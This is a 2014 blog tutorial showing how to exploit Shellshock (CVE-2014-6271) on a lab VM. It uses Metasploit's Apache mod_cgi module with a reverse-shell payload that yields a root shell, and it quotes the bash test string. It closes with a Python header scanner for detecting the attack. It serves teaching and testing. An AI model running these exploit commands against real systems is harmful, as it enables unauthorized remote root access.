程式扎記: [Toolkit] Simple Web Service - SimpleHttp.groovy

Tuesday, October 7, 2014

[Toolkit] Simple Web Service - SimpleHttp.groovy

Preface
Here I am going to introduce a toolkit to help us to run Metasploit on CVE-2014-6271 (Shellshock):
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Before we step forward, please make sure you have Kali Linux (download) ready and prepare one Linux/Unix VM as an exploitable target. Because we will run the toolkit introduced here inside the exploitable target, make sure the target has the following environment:
* JRE/JDK 1.7+ (Download)
* Groovy 2.2+ (Download)
* Python 2.6+ (Download)

Toolkit Usage
The toolkit, SimpleHttp.groovy, is a Groovy script, so you can open it and edit it. Edit its configuration settings before using it:
  ...
  /***************************************************************
  * - Configuration
  ***************************************************************/
  def useIPv6=false
  int listenPort=80
  int backLog=0
  def listenNIF="eth0"
  def listenAddr=""
  ...
The configuration settings are:
* useIPv6: True to bind IPv6 address; False to bind IPv4 address.
* listenPort: Binding port
* backLog: Socket backlog
* listenNIF: Force service to bind IP address from given network interface.
* listenAddr: Binding to specific IP address. This will have higher priority than listenNIF.

Start Http Service At Exploitable Target
CVE-2014-6271 only takes effect on specific versions of Bash. With this toolkit, that limitation is no longer a problem: because of its customized code, the toolkit is always exploitable. So our first step is to start the HTTP service with this toolkit.

This toolkit requires the Flib.jar library, so please make sure it exists in the libs folder (under the execution workspace). Then start the service with the command below:
# groovy -cp ./libs/* SimpleHttp.groovy # Put necessary libraries under ./libs/
[Info] Listen on NIF=eth0: /172.16.58.50

Then you can type in http://172.16.58.50/bash into the browser to make sure it works:

(If you can't access the URL correctly, please check the firewall setting.)

Our exploitable target is now ready to be exploited. The next step is to use Metasploit to do the testing.

Run CVE-2014-6271 Through Metasploit
Now let's move to Kali Linux. Enter "msfconsole" in the terminal to start the MSF interface:
# msfconsole
...
msf > // Now we are in MSF interface

Let's search CVE-2014-6271:
msf> search cve:2014-6271
...
exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 good Apache mod_cgi Bash Environment Variable Code Injection
...

Here we are going to exploit Apache mod_cgi, so let's use it:
msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > // Now we are using exploit apache_mod_cgi_bash_env_exec

Let's check how to use this exploit:
msf exploit(apache_mod_cgi_bash_env_exec) > show options

All required settings that are empty need to be filled with proper values according to our exploitable target:
msf exploit(apache_mod_cgi_bash_env_exec) > set VHOST 172.16.58.50
msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 172.16.58.50
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /bash
msf exploit(apache_mod_cgi_bash_env_exec) > show options

Now all the required options are set. Next, check whether the target is exploitable:
msf exploit(apache_mod_cgi_bash_env_exec) > check
[+] 172.16.58.50:80 - The target is vulnerable.

Let's move back to the console of the toolkit and check what kind of data was sent to us:

(The highlighted part is the exploit code used to attack the target with CVE-2014-6271.)

Finally, we are going to exploit the target and set up a reverse shell to control it:
msf exploit(apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell_reverse_tcp # Using reverse shell payload
payload => linux/x86/shell_reverse_tcp
msf exploit(apache_mod_cgi_bash_env_exec) > exploit // Start attack target

[*] Started reverse handler on 172.16.58.1:4444
[*] Command shell session 1 opened (172.16.58.1:4444 -> 172.16.58.50:43879) at 2014-10-07 06:06:42 -0700
[*] Command Stager progress - 100.61% done (822/817 bytes)

// Now we are ready to give command to exploitable target!
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 // The shell is running with root privilege.
^C // Ctrl+C to terminate the session/reverse shell
Abort session 1? [y/N] y

[*] 172.16.58.50 - Command shell session 1 closed. Reason: User exit


Supplement
Rapid7 - Dhclient Bash Environment Variable Injection
Rapid7 - OS X VMWare Fusion Privilege Escalation v...ash Environment Code Injection
Rapid7 - DHCP Client Bash Environment Variable Code Injection
Rapid7 - Pure-FTPd External Authentication Bash En...onment Variable Code Injection
Rapid7 - Apache mod_cgi Bash Environment Variable RCE Scanner
Rapid7 - Apache mod_cgi Bash Environment Variable Code Injection
Wiki - Shellshock
This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function. The vulnerability can be tested with the following command:
  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
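
The data seen on the toolkit console and the description above share one signature: a value that starts with a function definition and carries text after it. The following is an added example, not part of the original post or of SimpleHttp.groovy, that scans a raw HTTP request for header values of that shape; the function names, the naive brace matching and the sample request are constructed for illustration.

```python
import re

# Bash imports an environment value as a function when it starts with "() {".
# Allowing extra whitespace is an assumption made here to catch trivial variants.
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")

def trailing_after_function(value):
    """Return the text after the function body, or None if `value` does not
    start with a function definition. "" means nothing trails the body."""
    m = FUNC_PREFIX.match(value)
    if m is None:
        return None
    depth, i = 1, m.end()
    # Naive brace matching (ignores quoting): enough for triage, not a Bash parser.
    while i < len(value) and depth > 0:
        if value[i] == "{":
            depth += 1
        elif value[i] == "}":
            depth -= 1
        i += 1
    return value[i:].lstrip(" ;\t")

def cgi_env_name(header):
    """Name under which a CGI gateway exports a request header (RFC 3875)."""
    return "HTTP_" + header.upper().replace("-", "_")

def scan_request(raw):
    """Return (header, env name, trailing text) for each suspicious header."""
    findings = []
    for line in raw.splitlines()[1:]:   # skip the request line
        if not line:                    # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if not sep:
            continue
        trailing = trailing_after_function(value.strip())
        if trailing is not None:
            findings.append((name.strip(), cgi_env_name(name.strip()), trailing))
    return findings

# Constructed sample request; the marker is the test string quoted above.
SAMPLE_REQUEST = ("GET /bash HTTP/1.1\r\nHost: 172.16.58.50\r\n"
                  "User-Agent: () { :;}; echo vulnerable\r\n"
                  "Accept: */*\r\nReferer: () { :; }\r\n\r\n")

if __name__ == "__main__":
    for header, env, trailing in scan_request(SAMPLE_REQUEST):
        verdict = "trailing commands: %r" % trailing if trailing else "definition only"
        print("%s (%s): %s" % (header, env, verdict))
```

Any header value that matches is worth logging, since legitimate clients do not send values beginning with a function definition; a non-empty trailing part is what a vulnerable Bash would execute on import.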

